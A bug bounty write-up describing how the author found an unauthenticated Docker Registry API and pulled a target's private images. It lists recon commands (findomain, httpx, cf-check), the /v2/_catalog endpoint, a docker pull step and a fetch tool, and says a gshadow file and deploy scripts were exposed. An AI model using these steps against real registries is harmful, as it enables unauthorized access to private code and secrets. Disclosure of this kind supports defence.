Insecure Docker Registry API Leads To Pull All Private Docker Images

Hello Guys, I Would Like To Share This Report Has been reported To Public Program in bugcrowd

Summary

What is Docker?
Docker is a very popular platform used by developers to eliminate “works on my machine” problems when collaborating on code with co-workers. Enterprises use Docker to build agile software delivery pipelines to ship new features faster, more securely and with confidence for apps.

What are Docker Images and Containers?
An image is a file-system and parameters to use at run time. It doesn’t have state and never changes. A container image is a lightweight, stand-alone, executable package of a piece of software that includes everything needed to run it: code, run time, system tools, system libraries, settings. Containers isolate software from its surroundings, for example differences between development and staging environments and help reduce conflicts between teams running different software on the same infrastructure.

What is Docker Registry?
The Registry is a stateless, highly scalable server side application that stores and lets you distribute Docker images using HTTP API. Earlier versions of docker registry api i.e. v1 had a few problems and hence v2 was released and considerably improves security. However it should be noted that both versions of Docker Registry have no authentication enabled by default.

Steps To Reproduce The Vulnerability

1- Subdomain Enumration (findomain -t target.com -u subdomains.txt

2- I Used filter-resolved to resolve the subdomains (cat subdomains.txt | filter-resolved >> resolved.txt

3- I used cf-check tool to be able to know all ips behind cloudflare so ( cat resolved.txt | cf-check | tee -a ips_to_test.txt

4- then time to get the live ips (cat ips_to_test.txt | httpx -t 500 -o live_to_scan.txt

5- after some time I Got that https://vulnerble_docker_registry/v2/_catalog

6- in order to exploite the this i have to pull all docker images from docker registry (docker pull HOST:PORT/IMAGE_NAME)

7- or if you would like to pull docker images you can use this tool (https://github.com/NotSoSecure/docker_fetch)

8- congrats you have access to the private docker images

9- I used https://www.gitguardian.com/ to detect senstive information docker images

10-I will share some Sensitive information which is in the docker images

screenshot of requirments.txt file contain information about all the dependencies for django projects

gshadow file contain all internal groups

screenshot of some internal scripts to deploy the application

References

1- https://notsosecure.com/anatomy-of-a-hack-docker-registry

2-https://www.gitguardian.com/